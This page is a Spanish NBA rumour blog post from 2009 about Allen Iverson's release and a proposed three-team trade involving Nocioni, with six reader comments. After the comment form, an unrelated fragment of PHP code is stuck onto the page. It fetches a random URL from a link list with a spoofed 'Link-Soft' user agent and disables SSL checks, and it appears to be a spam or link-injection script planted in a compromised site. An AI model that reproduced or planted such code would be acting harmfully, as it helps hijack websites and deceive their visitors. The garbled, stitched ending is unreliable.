Una rápida de rumores

17 de November de 2009 por txusma

La rescisión del contrato entre Allen Iverson y los Memphis Grizzlies ha disparado toda la rumorología de la NBA. ¿Se retirará “The Answer”? ¿Jugará en Europa? De momento la opción que más suena es la de New York. Donnie Walsh está estudiando los pros y los contras de fichar a Iverson lo que podría implicar la salida de Larry Hughes en forma de BuyOut. Otra posibilidad podrían ser los Bobcats e incluso se ha hablado de que Iverson podría aceptar salir desde el banquillo si firma por un equipo con posibilidades reales de ganar el anillo… ¿Vosotros que harías si fueras el GM de New York?

En otro rumor que suena con fuerza Andres Nocioni (y sus 7 millones hasta 2012) podrían acabar en Boston en un traspaso a 3 bandas que implicaria también a Philadelphia. Kenny Thomas, Tony Allen y el gran Brian Scalabrine llegarían a los Sixers, Samuel Dalembert y JR Giddens a Sacramento y el argentino a los Celtics.

Comenta

6 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    No veo que ganarian los Kings (salvo que Dalembert termine contrato), porque con Thompson y Hawes ya van servidos por dentro, y con las lesiones de Garcia y Martin, es tonteria quitarse un exterior para traer a un pivot…

    Y los Sixers ganarian de cara al proximo año (15 millones que se quitarian con esos 3 que reciben y terminana contrato) pero no veo yo a mucho agente libre con ganas de ir a Philadelphia la verdad…

      Citar

  2. Txusma dice:
    #2

    Hawes no está precisamente a gran nivel y posiblemente le falte lo que buscan los Kings trayéndose a Dalembert: algo de competencia en su puesto. No debe ser nada bueno para un jugador joven saber que pase lo que pase tiene el puesto asegurado. Necesita tensión para mejorar y dar lo mejor de sí mismo.
    La salida de Nocioni implicaría dar más minutos a Donte Greene o Omar Casspi, con los que los Kings están bastante contentos.

      Citar

  3. TheDeerHunter dice:
    #3

    y Nocioni no te digo nada…

      Citar

  4. derbis jose dice:
    #4

    bueno a mi parecer creo que a miami apesar de las circuntancias por la que ha pasado allan iverson le caerian bien esos 12 y 3 asistencias a savienda que esos numeros fueron conseguido en tan solo 18 minutos de juego saven serian bueno por que si nuestro wade se nos lecionara que Dios no ayuede a que no pase
    seria bueno que cuando tuvieramos que mirar el banquillo de miami al menos alguien diera un poco de confieansa a la hora de tirar la bola y claro viniendo desde el banquillo tardariamos poco para alieniarlo de titular por que no veo confiable a nuestro almador titular yo diria: iverson, Wade, Beasley, Haslem, O´Neal veria un millon de puntos caer al canasto entonce miraria al banco y me encontraria Chalmers, Quentin Richardson
    Cook, entre otros pero creo que habria mas chance. que es lo que no veo y miedo si wade no se aucentara por uno buenos, buenos dias.

      Citar

  5. pcerezo dice:
    #5

    En cuanto a Iverson creo que cualquier GM pensará qué está mejor en casa.
    Lo de Nocioni debe ser un rumor salido de la franquicia de Boston Celtics, sería un gran refuerzo para dar más leña de la que todavía dan.

    Por cierto, muy interesante el post de Daimiel sobre los tres escoltas que serán agentes libres este verano.

    Pablo

      Citar

  6. Q dice:
    #6

    Philadelphia supongo que se querra librar a toda costa de los 12 millones que cobra Dalembert, aun le quedaria otro año de contrato y el jugador va cuesta abajo desde hace dos temporadas.
    El puesto queda cubierto con el ahora mismo lesionado Marreese Speights y Brand.

    La situacion de Sacramento la explica perfectamente Txusma, yo ademas añadiria que Donte Greene es un diamante en bruto y quizas por fin se hayan percatado. Ademas salen ganando con el cambio en terminos economicos.

    Y Boston…supongo que se veran con poco banquillo y que necesitan otro jugador contrastado mas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>